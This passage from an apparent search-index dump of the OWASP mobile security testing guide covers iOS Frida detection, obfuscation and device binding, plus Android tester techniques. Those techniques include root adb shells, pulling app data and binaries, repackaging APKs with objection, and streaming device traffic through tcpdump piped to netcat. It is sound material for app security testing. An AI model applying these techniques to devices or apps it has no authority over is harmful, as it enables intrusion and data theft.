"},{"location":"MASTG/iOS/0x06j-Testing-Resiliency-Against-Reverse-Engineering/#frida-detection","title":"Frida Detection","text":"Frida runs under the name of frida-server in its default configuration (injected mode) on a jailbroken device. When you explicitly attach to a target app (e.g. via frida-trace or the Frida CLI), Frida injects a frida-agent into the memory of the app. Therefore, you may expect to find it there after attaching to the app (and not before). On Android, verifying this is pretty straightforward as you can simply grep for the string \"frida\" in the memory maps of the process ID in the proc
directory (/proc/<pid>/maps
). However, on iOS the proc
directory is not available, but you can list the loaded dynamic libraries in an app with the function _dyld_image_count
.
Frida may also run in the so-called embedded mode, which also works for non-jailbroken devices. It consists of embedding a frida-gadget into the IPA and forcing the app to load it as one of its native libraries.
The application's static content, including its ARM-compiled binary and its external libraries, is stored inside the <Application>.app
directory. If you inspect the content of the /var/containers/Bundle/Application/<UUID>/<Application>.app
directory, you'll find the embedded frida-gadget as FridaGadget.dylib.
iPhone:/var/containers/Bundle/Application/AC5DC1FD-3420-42F3-8CB5-E9D77C4B287A/SwiftSecurity.app/Frameworks root# ls -alh\ntotal 87M\ndrwxr-xr-x 10 _installd _installd 320 Nov 19 06:08 ./\ndrwxr-xr-x 11 _installd _installd 352 Nov 19 06:08 ../\n-rw-r--r-- 1 _installd _installd 70M Nov 16 06:37 FridaGadget.dylib\n-rw-r--r-- 1 _installd _installd 3.8M Nov 16 06:37 libswiftCore.dylib\n-rw-r--r-- 1 _installd _installd 71K Nov 16 06:37 libswiftCoreFoundation.dylib\n-rw-r--r-- 1 _installd _installd 136K Nov 16 06:38 libswiftCoreGraphics.dylib\n-rw-r--r-- 1 _installd _installd 99K Nov 16 06:37 libswiftDarwin.dylib\n-rw-r--r-- 1 _installd _installd 189K Nov 16 06:37 libswiftDispatch.dylib\n-rw-r--r-- 1 _installd _installd 1.9M Nov 16 06:38 libswiftFoundation.dylib\n-rw-r--r-- 1 _installd _installd 76K Nov 16 06:37 libswiftObjectiveC.dylib\n
Looking at these traces that Frida leaves behind, you might already imagine that detecting Frida would be a trivial task. And while it is trivial to detect these libraries, it is equally trivial to bypass such a detection. Detection of tools is a cat and mouse game and things can get much more complicated. The following table shortly presents a set of some typical Frida detection methods and a short discussion on their effectiveness.
Some of the following detection methods are implemented in the iOS Security Suite.
Method Description Discussion Check The Environment For Related Artifacts Artifacts can be packaged files, binaries, libraries, processes, and temporary files. For Frida, this could be the frida-server running in the target (jailbroken) system (the daemon responsible for exposing Frida over TCP) or the frida libraries loaded by the app. Inspecting running services is not possible for an iOS app on a non-jailbroken device. The Swift method CommandLine is not available on iOS to query for information about running processes, but there are unofficial ways, such as by using NSTask. Nevertheless when using this method, the app will be rejected during the App Store review process. There is no other public API available to query for running processes or execute system commands within an iOS App. Even if it would be possible, bypassing this would be as easy as just renaming the corresponding Frida artifact (frida-server/frida-gadget/frida-agent). Another way to detect Frida, would be to walk through the list of loaded libraries and check for suspicious ones (e.g. those including \"frida\" in their names), which can be done by using_dyld_get_image_name
. Checking For Open TCP Ports The frida-server process binds to TCP port 27042 by default. Testing whether this port is open is another method of detecting the daemon. This method detects frida-server in its default mode, but the listening port can be changed via a command line argument, so bypassing this is very trivial. Checking For Ports Responding To D-Bus Auth frida-server
uses the D-Bus protocol to communicate, so you can expect it to respond to D-Bus AUTH. Send a D-Bus AUTH message to every open port and check for an answer, hoping that frida-server
will reveal itself. This is a fairly robust method of detecting frida-server
, but Frida offers alternative modes of operation that don't require frida-server. Please remember that this table is far from exhaustive. For example, two other possible detection mechanisms are:
Both would help to detect Substrate or Frida's Interceptor but, for example, won't be effective against Frida's Stalker. Remember that the success of each of these detection methods will depend on whether you're using a jailbroken device, the specific version of the jailbreak and method and/or the version of the tool itself. At the end, this is part of the cat and mouse game of protecting data being processed on an uncontrolled environment (the end user's device).
"},{"location":"MASTG/iOS/0x06j-Testing-Resiliency-Against-Reverse-Engineering/#emulator-detection","title":"Emulator Detection","text":"The goal of emulator detection is to increase the difficulty of running the app on an emulated device. This forces the reverse engineer to defeat the emulator checks or utilize the physical device, thereby barring the access required for large-scale device analysis.
As discussed in the section Testing on the iOS Simulator in the basic security testing chapter, the only available simulator is the one that ships with Xcode. Simulator binaries are compiled to x86 code instead of ARM code and apps compiled for a real device (ARM architecture) don't run in the simulator, hence simulation protection was not so much a concern regarding iOS apps in contrast to Android with a wide range of emulation choices available.
However, since its release, Corellium (commercial tool) has enabled real emulation, setting itself apart from the iOS simulator. In addition to that, being a SaaS solution, Corellium enables large-scale device analysis with the limiting factor just being available funds.
With Apple Silicon (ARM) hardware widely available, traditional checks for the presence of x86 / x64 architecture might not suffice. One potential detection strategy is to identify features and limitations available for commonly used emulation solutions. For instance, Corellium doesn't support iCloud, cellular services, camera, NFC, Bluetooth, App Store access or GPU hardware emulation (Metal). Therefore, smartly combining checks involving any of these features could be an indicator for the presence of an emulated environment.
Pairing these results with the ones from 3rd party frameworks such as iOS Security Suite, Trusteer or a no-code solution such as Appdome (commercial solution) will provide a good line of defense against attacks utilizing emulators.
"},{"location":"MASTG/iOS/0x06j-Testing-Resiliency-Against-Reverse-Engineering/#obfuscation","title":"Obfuscation","text":"The chapter \"Mobile App Tampering and Reverse Engineering\" introduces several well-known obfuscation techniques that can be used in mobile apps in general.
"},{"location":"MASTG/iOS/0x06j-Testing-Resiliency-Against-Reverse-Engineering/#name-obfuscation","title":"Name Obfuscation","text":"The standard compiler generates binary symbols based on class and function names from the source code. Therefore, if no obfuscation was applied, symbol names remain meaningful and can be easily read straight from the app binary. For instance, a function which detects a jailbreak can be located by searching for relevant keywords (e.g. \"jailbreak\"). The listing below shows the disassembled function JailbreakDetectionViewController.jailbreakTest4Tapped
from the Damn Vulnerable iOS App (DVIA-v2).
__T07DVIA_v232JailbreakDetectionViewControllerC20jailbreakTest4TappedyypF:\nstp x22, x21, [sp, #-0x30]!\nmov rbp, rsp\n
After the obfuscation we can observe that the symbol\u2019s name is no longer meaningful as shown on the listing below.
__T07DVIA_v232zNNtWKQptikYUBNBgfFVMjSkvRdhhnbyyFySbyypF:\nstp x22, x21, [sp, #-0x30]!\nmov rbp, rsp\n
Nevertheless, this only applies to the names of functions, classes and fields. The actual code remains unmodified, so an attacker can still read the disassembled version of the function and try to understand its purpose (e.g. to retrieve the logic of a security algorithm).
"},{"location":"MASTG/iOS/0x06j-Testing-Resiliency-Against-Reverse-Engineering/#instruction-substitution","title":"Instruction Substitution","text":"This technique replaces standard binary operators like addition or subtraction with more complex representations. For example an addition x = a + b
can be represented as x = -(-a) - (-b)
. However, using the same replacement representation could be easily reversed, so it is recommended to add multiple substitution techniques for a single case and introduce a random factor. This technique is vulnerable to deobfuscation, but depending on the complexity and depth of the substitutions, applying it can still be time consuming.
Control flow flattening replaces original code with a more complex representation. The transformation breaks the body of a function into basic blocks and puts them all inside a single infinite loop with a switch statement that controls the program flow. This makes the program flow significantly harder to follow because it removes the natural conditional constructs that usually make the code easier to read.
The image shows how control flow flattening alters code. See \"Obfuscating C++ programs via control flow flattening\" for more information.
"},{"location":"MASTG/iOS/0x06j-Testing-Resiliency-Against-Reverse-Engineering/#dead-code-injection","title":"Dead Code Injection","text":"This technique makes the program's control flow more complex by injecting dead code into the program. Dead code is a stub of code that doesn\u2019t affect the original program\u2019s behaviour but increases the overhead for the reverse engineering process.
"},{"location":"MASTG/iOS/0x06j-Testing-Resiliency-Against-Reverse-Engineering/#string-encryption","title":"String Encryption","text":"Applications are often compiled with hardcoded keys, licences, tokens and endpoint URLs. By default, all of them are stored in plaintext in the data section of an application\u2019s binary. This technique encrypts these values and injects stubs of code into the program that will decrypt that data before it is used by the program.
"},{"location":"MASTG/iOS/0x06j-Testing-Resiliency-Against-Reverse-Engineering/#recommended-tools","title":"Recommended Tools","text":"Learn more about iOS obfuscation techniques in the paper \"Protecting Million-User iOS Apps with Obfuscation: Motivations, Pitfalls, and Experience\".
"},{"location":"MASTG/iOS/0x06j-Testing-Resiliency-Against-Reverse-Engineering/#device-binding","title":"Device Binding","text":"The purpose of device binding is to impede an attacker who tries to copy an app and its state from device A to device B and continue the execution of the app on device B. After device A has been determined trusted, it may have more privileges than device B. This situation shouldn't change when an app is copied from device A to device B.
Since iOS 7.0, hardware identifiers (such as MAC addresses) are off-limits but there are other methods for implementing device binding in iOS:
identifierForVendor
: You can use [[UIDevice currentDevice] identifierForVendor]
(in Objective-C), UIDevice.current.identifierForVendor?.uuidString
(in Swift3), or UIDevice.currentDevice().identifierForVendor?.UUIDString
(in Swift2). The value of identifierForVendor
may not be the same if you reinstall the app after other apps from the same vendor are installed and it may change when you update your app bundle's name. Therefore it is best to combine it with something in the Keychain.kSecAttrAccessibleWhenPasscodeSetThisDeviceOnly
(if you want to secure the data and properly enforce a passcode or Touch ID requirement), kSecAttrAccessibleAfterFirstUnlockThisDeviceOnly
, or kSecAttrAccessibleWhenUnlockedThisDeviceOnly
.Any scheme based on these methods will be more secure the moment a passcode and/or Touch ID is enabled, the materials stored in the Keychain or filesystem are protected with protection classes (such as kSecAttrAccessibleAfterFirstUnlockThisDeviceOnly
and kSecAttrAccessibleWhenUnlockedThisDeviceOnly
), and the SecAccessControlCreateFlags
is set either with kSecAccessControlDevicePasscode
(for passcodes), kSecAccessControlUserPresence
(passcode, Face ID or Touch ID), kSecAccessControlBiometryAny
(Face ID or Touch ID) or kSecAccessControlBiometryCurrentSet
(Face ID / Touch ID: but current enrolled biometrics only).
One of the most common things you do when testing an app is accessing the device shell. In this section we'll see how to access the Android shell both remotely from your host computer with/without a USB cable and locally from the device itself.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0001/#remote-shell","title":"Remote Shell","text":"In order to connect to the shell of an Android device from your host computer, adb is usually your tool of choice (unless you prefer to use remote SSH access, e.g. via Termux).
For this section we assume that you've properly enabled Developer Mode and USB debugging as explained in \"Testing on a Real Device\". Once you've connected your Android device via USB, you can access the remote device's shell by running:
adb shell\n
press Control + D or type exit
to quit
Once in the remote shell, if your device is rooted or you're using the emulator, you can get root access by running su
:
bullhead:/ $ su\nbullhead:/ # id\nuid=0(root) gid=0(root) groups=0(root) context=u:r:su:s0\n
Only if you're working with an emulator you may alternatively restart adb with root permissions with the command adb root
so next time you enter adb shell
you'll have root access already. This also allows to transfer data bidirectionally between your host computer and the Android file system, even with access to locations where only the root user has access to (via adb push/pull
). See more about data transfer in section \"Host-Device Data Transfer\" below.
If you have more than one device, remember to include the -s
flag followed by the device serial ID on all your adb
commands (e.g. adb -s emulator-5554 shell
or adb -s 00b604081540b7c6 shell
). You can get a list of all connected devices and their serial IDs by using the following command:
adb devices\nList of devices attached\n00c907098530a82c device\nemulator-5554 device\n
"},{"location":"MASTG/techniques/android/MASTG-TECH-0001/#connect-to-a-device-over-wi-fi","title":"Connect to a Device over Wi-Fi","text":"You can also access your Android device without using the USB cable. For this you'll have to connect both your host computer and your Android device to the same Wi-Fi network and follow the next steps:
adb tcpip 5555
.adb connect <device_ip_address>
. Check that the device is now available by running adb devices
.adb shell
.However, notice that by doing this you leave your device open to anyone being in the same network and knowing the IP address of your device. You may rather prefer using the USB connection.
For example, on a Nexus device, you can find the IP address at Settings -> System -> About phone -> Status -> IP address or by going to the Wi-Fi menu and tapping once on the network you're connected to.
See the full instructions and considerations in the Android Developers Documentation.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0001/#connect-to-a-device-via-ssh","title":"Connect to a Device via SSH","text":"If you prefer, you can also enable SSH access. A convenient option is to use Termux, which you can easily configure to offer SSH access (with password or public key authentication) and start it with the command sshd
(starts by default on port 8022). In order to connect to the Termux via SSH you can simply run the command ssh -p 8022 <ip_address>
(where ip_address
is the actual remote device IP). This option has some additional benefits as it allows to access the file system via SFTP also on port 8022.
While usually using an on-device shell (terminal emulator) such as Termux might be very tedious compared to a remote shell, it can prove handy for debugging in case of, for example, network issues or to check some configuration.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0002/","title":"Host-Device Data Transfer","text":""},{"location":"MASTG/techniques/android/MASTG-TECH-0002/#using-adb","title":"Using adb","text":"You can copy files to and from a device by using the adb commands adb pull <remote> <local>
and adb push <local> <remote>
commands. Their usage is very straightforward. For example, the following will copy foo.txt
from your current directory (local) to the sdcard
folder (remote):
adb push foo.txt /sdcard/foo.txt\n
This approach is commonly used when you know exactly what you want to copy and from/to where and also supports bulk file transfer, e.g. you can pull (copy) a whole directory from the Android device to your host computer.
$ adb pull /sdcard\n/sdcard/: 1190 files pulled. 14.1 MB/s (304526427 bytes in 20.566s)\n
"},{"location":"MASTG/techniques/android/MASTG-TECH-0002/#using-android-studio-device-file-explorer","title":"Using Android Studio Device File Explorer","text":"Android Studio has a built-in Device File Explorer which you can open by going to View -> Tool Windows -> Device File Explorer.
If you're using a rooted device you can now start exploring the whole file system. However, when using a non-rooted device accessing the app sandboxes won't work unless the app is debuggable and even then you are \"jailed\" within the app sandbox.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0002/#using-objection","title":"Using objection","text":"This option is useful when you are working on a specific app and want to copy files you might encounter inside its sandbox (notice that you'll only have access to the files that the target app has access to). This approach works without having to set the app as debuggable, which is otherwise required when using Android Studio's Device File Explorer.
First, connect to the app with Objection as explained in \"Recommended Tools - Objection\". Then, use ls
and cd
as you normally would on your terminal to explore the available files:
$ frida-ps -U | grep -i owasp\n21228 sg.vp.owasp_mobile.omtg_android\n\n$ objection -g sg.vp.owasp_mobile.omtg_android explore\n\n...g.vp.owasp_mobile.omtg_android on (google: 8.1.0) [usb] # cd ..\n/data/user/0/sg.vp.owasp_mobile.omtg_android\n\n...g.vp.owasp_mobile.omtg_android on (google: 8.1.0) [usb] # ls\nType ... Name\n--------- ... -------------------\nDirectory ... cache\nDirectory ... code_cache\nDirectory ... lib\nDirectory ... shared_prefs\nDirectory ... files\nDirectory ... app_ACRA-approved\nDirectory ... app_ACRA-unapproved\nDirectory ... databases\n\nReadable: True Writable: True\n
One you have a file you want to download you can just run file download <some_file>
. This will download that file to your working directory. The same way you can upload files using file upload
.
...[usb] # ls\nType ... Name\n------ ... -----------------------------------------------\nFile ... sg.vp.owasp_mobile.omtg_android_preferences.xml\n\nReadable: True Writable: True\n...[usb] # file download sg.vp.owasp_mobile.omtg_android_preferences.xml\nDownloading ...\nStreaming file from device...\nWriting bytes to destination...\nSuccessfully downloaded ... to sg.vp.owasp_mobile.omtg_android_preferences.xml\n
The downside is that, at the time of this writing, objection does not support bulk file transfer yet, so you're restricted to copy individual files. Still, this can come handy in some scenarios where you're already exploring the app using objection anyway and find some interesting file. Instead of for example taking note of the full path of that file and use adb pull <path_to_some_file>
from a separate terminal, you might just want to directly do file download <some_file>
.
There are several ways of extracting APK files from a device. You will need to decide which one is the easiest method depending if the app is public or private.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0003/#alternative-app-stores","title":"Alternative App Stores","text":"One of the easiest options is to download the APK from websites that mirror public applications from the Google Play Store. However, keep in mind that these sites are not official and there is no guarantee that the application hasn't been repackaged or contain malware. A few reputable websites that host APKs and are not known for modifying apps and even list SHA-1 and SHA-256 checksums of the apps are:
Beware that you do not have control over these sites and you cannot guarantee what they do in the future. Only use them if it's your only option left.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0003/#using-gplaycli","title":"Using gplaycli","text":"You can use gplaycli to download (-d
) the selected APK by specifying its AppID (add -p
to show a progress bar and -v
for verbosity):
$ gplaycli -p -v -d com.google.android.keep\n[INFO] GPlayCli version 3.26 [Python3.7.4]\n[INFO] Configuration file is ~/.config/gplaycli/gplaycli.conf\n[INFO] Device is bacon\n[INFO] Using cached token.\n[INFO] Using auto retrieved token to connect to API\n[INFO] 1 / 1 com.google.android.keep\n[################################] 15.78MB/15.78MB - 00:00:02 6.57MB/s/s\n[INFO] Download complete\n
The com.google.android.keep.apk
file will be in your current directory. As you might imagine, this approach is a very convenient way to download APKs, especially with regards to automation.
You may use your own Google Play credentials or token. By default, gplaycli will use an internally provided token.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0003/#extracting-the-app-package-from-the-device","title":"Extracting the App Package from the Device","text":"Obtaining app packages from the device is the recommended method as we can guarantee the app hasn't been modified by a third-party. To obtain applications from a rooted or non-rooted device, you can use the following methods:
Use adb pull
to retrieve the APK. If you don't know the package name, the first step is to list all the applications installed on the device:
adb shell pm list packages\n
Once you have located the package name of the application, you need the full path where it is stored on the system to download it.
adb shell pm path <package name>\n
With the full path to the APK, you can now simply use adb pull
to extract it.
adb pull <apk path>\n
The APK will be downloaded in your working directory.
Alternatively, there are also apps like APK Extractor that do not require root and can even share the extracted APK via your preferred method. This can be useful if you don't feel like connecting the device or setting up adb over the network to transfer the file.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0003/#testing-instant-apps","title":"Testing Instant Apps","text":"With Google Play Instant you can create Instant apps which can be instantly launched from a browser or the \"try now\" button from the app store from Android 5.0 (API level 21) onward. They do not require any form of installation. There are a few challenges with an instant app:
The combination of these can lead to insecure decisions, such as: stripping too much of the authorization/authentication/confidentiality logic from an app, which allows for information leakage.
Note: Instant apps require an App Bundle. App Bundles are described in the \"App Bundles\" section of the \"Android Platform Overview\" chapter.
Static Analysis Considerations:
Static analysis can be either done after reverse engineering a downloaded instant app, or by analyzing the App Bundle. When you analyze the App Bundle, check the Android Manifest to see whether dist:module dist:instant=\"true\"
is set for a given module (either the base or a specific module with dist:module
set). Next, check for the various entry points, which entry points are set (by means of <data android:path=\"</PATH/HERE>\" />
).
Now follow the entry points, like you would do for any Activity and check:
Dynamic Analysis Considerations:
There are multiple ways to start the dynamic analysis of your instant app. In all cases, you will first have to install the support for instant apps and add the ia
executable to your $PATH
.
The installation of instant app support is taken care off through the following command:
cd path/to/android/sdk/tools/bin && ./sdkmanager 'extras;google;instantapps'\n
Next, you have to add path/to/android/sdk/extras/google/instantapps/ia
to your $PATH
.
After the preparation, you can test instant apps locally on a device running Android 8.1 (API level 27) or later. The app can be tested in different ways:
Deploy as instant app
checkbox in the Run/Configuration dialog) or deploy the app using the following command:ia run output-from-build-command <app-artifact>\n
try now
button in the App store from the testers account.Now that you can test the app, check whether:
If you need to test on a non-jailbroken device you should learn how to repackage an app to enable dynamic testing on it.
Use a computer to perform all the steps indicated in the article \"Patching Android Applications\" from the objection Wiki. Once you're done you'll be able to patch an APK by calling the objection command:
objection patchapk --source app-release.apk\n
The patched application then needs to be installed using adb, as explained in \"Installing Apps\".
This repackaging method is enough for most use cases. For more advanced repackaging, refer to \"Android Tampering and Reverse Engineering - Patching, Repackaging and Re-Signing\".
"},{"location":"MASTG/techniques/android/MASTG-TECH-0005/","title":"Installing Apps","text":"Use adb install
to install an APK on an emulator or connected device.
adb install path_to_apk\n
Note that if you have the original source code and use Android Studio, you do not need to do this because Android Studio handles the packaging and installation of the app for you.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0006/","title":"Listing Installed Apps","text":"When targeting apps that are installed on the device, you'll first have to figure out the correct package name of the application you want to analyze. You can retrieve the installed apps either by using pm
(Android Package Manager) or by using frida-ps
:
$ adb shell pm list packages\npackage:sg.vantagepoint.helloworldjni\npackage:eu.chainfire.supersu\npackage:org.teamsik.apps.hackingchallenge.easy\npackage:org.teamsik.apps.hackingchallenge.hard\npackage:sg.vp.owasp_mobile.omtg_android\n
You can include flags to show only third party apps (-3
) and the location of their APK file (-f
), which you can use afterwards to download it via adb pull
:
$ adb shell pm list packages -3 -f\npackage:/data/app/sg.vantagepoint.helloworldjni-1/base.apk=sg.vantagepoint.helloworldjni\npackage:/data/app/eu.chainfire.supersu-1/base.apk=eu.chainfire.supersu\npackage:/data/app/org.teamsik.apps.hackingchallenge.easy-1/base.apk=org.teamsik.apps.hackingchallenge.easy\npackage:/data/app/org.teamsik.apps.hackingchallenge.hard-1/base.apk=org.teamsik.apps.hackingchallenge.hard\npackage:/data/app/sg.vp.owasp_mobile.omtg_android-kR0ovWl9eoU_yh0jPJ9caQ==/base.apk=sg.vp.owasp_mobile.omtg_android\n
This is the same as running adb shell pm path <app_package_id>
on an app package ID:
$ adb shell pm path sg.vp.owasp_mobile.omtg_android\npackage:/data/app/sg.vp.owasp_mobile.omtg_android-kR0ovWl9eoU_yh0jPJ9caQ==/base.apk\n
Use frida-ps -Uai
to get all apps (-a
) currently installed (-i
) on the connected USB device (-U
):
$ frida-ps -Uai\n PID Name Identifier\n----- ---------------------------------------- ---------------------------------------\n 766 Android System android\n21228 Attack me if u can sg.vp.owasp_mobile.omtg_android\n 4281 Termux com.termux\n - Uncrackable1 sg.vantagepoint.uncrackable1\n
Note that this also shows the PID of the apps that are running at the moment. Take a note of the \"Identifier\" and the PID if any as you'll need them afterwards.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0007/","title":"Exploring the App Package","text":"Once you have collected the package name of the application you want to target, you'll want to start gathering information about it. First, retrieve the APK as explained in \"Basic Testing Operations - Obtaining and Extracting Apps\".
APK files are actually ZIP files that can be unpacked using a standard decompression utility such as unzip
. However, we recommend using apktool which additionally decodes the AndroidManifest.xml and disassembles the app binaries (classes.dex) to smali code:
$ apktool d UnCrackable-Level3.apk\n$ tree\n.\n\u251c\u2500\u2500 AndroidManifest.xml\n\u251c\u2500\u2500 apktool.yml\n\u251c\u2500\u2500 lib\n\u251c\u2500\u2500 original\n\u2502 \u251c\u2500\u2500 AndroidManifest.xml\n\u2502 \u2514\u2500\u2500 META-INF\n\u2502 \u251c\u2500\u2500 CERT.RSA\n\u2502 \u251c\u2500\u2500 CERT.SF\n\u2502 \u2514\u2500\u2500 MANIFEST.MF\n\u251c\u2500\u2500 res\n...\n\u2514\u2500\u2500 smali\n
The following files are unpacked:
As unzipping with the standard unzip
utility leaves some files such as the AndroidManifest.xml
unreadable, it's better to unpack the APK using apktool.
$ ls -alh\ntotal 32\ndrwxr-xr-x 9 sven staff 306B Dec 5 16:29 .\ndrwxr-xr-x 5 sven staff 170B Dec 5 16:29 ..\n-rw-r--r-- 1 sven staff 10K Dec 5 16:29 AndroidManifest.xml\n-rw-r--r-- 1 sven staff 401B Dec 5 16:29 apktool.yml\ndrwxr-xr-x 6 sven staff 204B Dec 5 16:29 assets\ndrwxr-xr-x 3 sven staff 102B Dec 5 16:29 lib\ndrwxr-xr-x 4 sven staff 136B Dec 5 16:29 original\ndrwxr-xr-x 131 sven staff 4.3K Dec 5 16:29 res\ndrwxr-xr-x 9 sven staff 306B Dec 5 16:29 smali\n
"},{"location":"MASTG/techniques/android/MASTG-TECH-0007/#the-android-manifest","title":"The Android Manifest","text":"The Android Manifest is the main source of information, it includes a lot of interesting information such as the package name, the permissions, app components, etc.
Here's a non-exhaustive list of some info and the corresponding keywords that you can easily search for in the Android Manifest by just inspecting the file or by using grep -i <keyword> AndroidManifest.xml
:
permission
(see \"Android Platform APIs\")android:allowBackup
(see \"Data Storage on Androidactivity
, service
, provider
, receiver
(see \"Android Platform APIs\" and \"Data Storage on Androiddebuggable
(see \"Code Quality and Build Settings of Android Apps\")Please refer to the mentioned chapters to learn more about how to test each of these points.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0007/#app-binary","title":"App Binary","text":"The app binary (classes.dex
) can be found in the root directory of the app package. It is a so-called DEX (Dalvik Executable) file that contains compiled Java code. Due to its nature, after applying some conversions you'll be able to use a decompiler to produce Java code. We've also seen the folder smali
that was obtained after we run apktool. This contains the disassembled Dalvik bytecode in an intermediate language called smali, which is a human-readable representation of the Dalvik executable.
Refer to the section \"Reviewing Decompiled Java Code\" in the chapter \"Tampering and Reverse Engineering on Android\" for more information about how to reverse engineer DEX files.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0007/#compiled-app-binary","title":"Compiled App Binary","text":"In some cases it might be useful to retrieve the compiled app binary (.odex).
First get the path to the app's data directory:
adb shell pm path com.example.myapplication\npackage:/data/app/~~DEMFPZh7R4qfUwwwh1czYA==/com.example.myapplication-pOslqiQkJclb_1Vk9-WAXg==/base.apk\n
Remove the /base.apk
part, add /oat/arm64/base.odex
and use the resulting path to pull the base.odex from the device:
adb root\nadb pull /data/app/~~DEMFPZh7R4qfUwwwh1czYA==/com.example.myapplication-pOslqiQkJclb_1Vk9-WAXg==/oat/arm64/base.odex\n
Note that the exact directory will be different based on your Android version. If the /oat/arm64/base.odex
file can't be found, manually search in the directory returned by pm path
.
You can inspect the lib
folder in the APK:
$ ls -1 lib/armeabi/\nlibdatabase_sqlcipher.so\nlibnative.so\nlibsqlcipher_android.so\nlibstlport_shared.so\n
or from the device with objection:
...g.vp.owasp_mobile.omtg_android on (google: 8.1.0) [usb] # ls lib\nType ... Name\n------ ... ------------------------\nFile ... libnative.so\nFile ... libdatabase_sqlcipher.so\nFile ... libstlport_shared.so\nFile ... libsqlcipher_android.so\n
For now this is all information you can get about the native libraries unless you start reverse engineering them, which is done using a different approach than the one used to reverse the app binary as this code cannot be decompiled but only disassembled. Refer to the section \"Reviewing Disassemble Native Code\" in the chapter \"Tampering and Reverse Engineering on Android\" for more information about how to reverse engineer these libraries.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0007/#other-app-resources","title":"Other App Resources","text":"It is normally worth taking a look at the rest of the resources and files that you may find in the root folder of the APK as some times they contain additional goodies like key stores, encrypted databases, certificates, etc.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0008/","title":"Accessing App Data Directories","text":"Once you have installed the app, there is further information to explore, where tools like objection come in handy.
When using objection you can retrieve different kinds of information, where env
will show you all the directory information of the app.
$ objection -g sg.vp.owasp_mobile.omtg_android explore\n\n...g.vp.owasp_mobile.omtg_android on (google: 8.1.0) [usb] # env\n\nName Path\n---------------------- ---------------------------------------------------------------------------\ncacheDirectory /data/user/0/sg.vp.owasp_mobile.omtg_android/cache\ncodeCacheDirectory /data/user/0/sg.vp.owasp_mobile.omtg_android/code_cache\nexternalCacheDirectory /storage/emulated/0/Android/data/sg.vp.owasp_mobile.omtg_android/cache\nfilesDirectory /data/user/0/sg.vp.owasp_mobile.omtg_android/files\nobbDir /storage/emulated/0/Android/obb/sg.vp.owasp_mobile.omtg_android\npackageCodePath /data/app/sg.vp.owasp_mobile.omtg_android-kR0ovWl9eoU_yh0jPJ9caQ==/base.apk\n
Among this information we find:
/data/data/[package-name]
or /data/user/0/[package-name]
/storage/emulated/0/Android/data/[package-name]
or /sdcard/Android/data/[package-name]
/data/app/
The internal data directory is used by the app to store data created during runtime and has the following basic structure:
...g.vp.owasp_mobile.omtg_android on (google: 8.1.0) [usb] # ls\nType ... Name\n--------- ... -------------------\nDirectory ... cache\nDirectory ... code_cache\nDirectory ... lib\nDirectory ... shared_prefs\nDirectory ... files\nDirectory ... databases\n\nReadable: True Writable: True\n
Each folder has its own purpose:
However, the app might store more data not only inside these folders but also in the parent folder (/data/data/[package-name]
).
Refer to the \"Testing Data Storage\" chapter for more information and best practices on securely storing sensitive data.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0009/","title":"Monitoring System Logs","text":"On Android you can easily inspect the log of system messages by using Logcat
. There are two ways to execute Logcat:
adb logcat > logcat.log\n
With the following command you can specifically grep for the log output of the app in scope, just insert the package name. Of course your app needs to be running for ps
to be able to get its PID.
adb logcat | grep \"$(adb shell ps | grep <package-name> | awk '{print $2}')\"\n
If you already know the app PID you may give it directly using --pid
flag.
You may also want to apply further filters or regular expressions (using logcat
's regex flags -e <expr>, --regex=<expr>
for example) if you expect certain strings or patterns to come up in the logs.
Remotely sniffing all Android traffic in real-time is possible with tcpdump, netcat (nc), and Wireshark. First, make sure that you have the latest version of Android tcpdump on your phone. Here are the installation steps:
adb root\nadb remount\nadb push /wherever/you/put/tcpdump /system/xbin/tcpdump\n
If execution of adb root
returns the error adbd cannot run as root in production builds
, install tcpdump as follows:
adb push /wherever/you/put/tcpdump /data/local/tmp/tcpdump\nadb shell\nsu\nmount -o rw,remount /system;\ncp /data/local/tmp/tcpdump /system/xbin/\ncd /system/xbin\nchmod 755 tcpdump\n
In certain production builds, you might encounter an error mount: '/system' not in /proc/mounts
.
In that case, you can replace the above line $ mount -o rw,remount /system;
with $ mount -o rw,remount /
, as described in this Stack Overflow post.
Remember: To use tcpdump, you need root privileges on the phone!
Execute tcpdump
once to see if it works. Once a few packets have come in, you can stop tcpdump by pressing CTRL+c.
$ tcpdump\ntcpdump: verbose output suppressed, use -v or -vv for full protocol decode\nlistening on wlan0, link-type EN10MB (Ethernet), capture size 262144 bytes\n04:54:06.590751 00:9e:1e:10:7f:69 (oui Unknown) > Broadcast, RRCP-0x23 reply\n04:54:09.659658 00:9e:1e:10:7f:69 (oui Unknown) > Broadcast, RRCP-0x23 reply\n04:54:10.579795 00:9e:1e:10:7f:69 (oui Unknown) > Broadcast, RRCP-0x23 reply\n^C\n3 packets captured\n3 packets received by filter\n0 packets dropped by kernel\n
To remotely sniff the Android phone's network traffic, first execute tcpdump
and pipe its output to netcat
(nc):
tcpdump -i wlan0 -s0 -w - | nc -l -p 11111\n
The tcpdump command above involves
-
, which will make tcpdump write to stdout.By using the pipe (|
), we sent all output from tcpdump to netcat, which opens a listener on port 11111. You'll usually want to monitor the wlan0 interface. If you need another interface, list the available options with the command $ ip addr
.
To access port 11111, you need to forward the port to your host computer via adb.
adb forward tcp:11111 tcp:11111\n
The following command connects you to the forwarded port via netcat and piping to Wireshark.
nc localhost 11111 | wireshark -k -S -i -\n
Wireshark should start immediately (-k). It gets all data from stdin (-i -) via netcat, which is connected to the forwarded port. You should see all the phone's traffic from the wlan0 interface.
You can display the captured traffic in a human-readable format with Wireshark. Figure out which protocols are used and whether they are unencrypted. Capturing all traffic (TCP and UDP) is important, so you should execute all functions of the tested application and analyze it.
This neat little trick allows you now to identify what kind of protocols are used and to which endpoints the app is talking to. The questions is now, how can I test the endpoints if Burp is not capable of showing the traffic? There is no easy answer for this, but a few Burp plugins that can get you started.
